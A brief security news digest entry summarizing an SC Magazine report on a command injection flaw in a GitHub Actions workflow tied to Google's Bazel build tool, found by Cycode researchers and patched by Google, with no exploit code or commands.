"Google Supply Chain Bug Patched in Code-Testing Tool Bazel"

A critical supply chain bug in Bazel, Google's open-source software development tool, allowed hackers to insert malicious code. The command injection vulnerability compromised the security of millions of Bazel-dependent projects, including Kubernetes, Angular, Uber, LinkedIn, Databricks, DropBox, Nvidia, and Google. Researchers at Cycode discovered the flaw in November 2023, and Google fixed it within seven days. The Cycode Research Team found that a GitHub Actions workflow could have been injected by malicious code because of the command injection vulnerability in one of Bazel’s dependent Actions. This vulnerability has a direct impact on the software supply chain, potentially enabling malicious actors to insert harmful code into the Bazel codebase, create a backdoor, and disrupt the production environment of anyone using Bazel. This article continues to discuss the critical supply chain bug in Bazel.

SC Magazine reports "Google Supply Chain Bug Patched in Code-Testing Tool Bazel"

Submitted by grigby1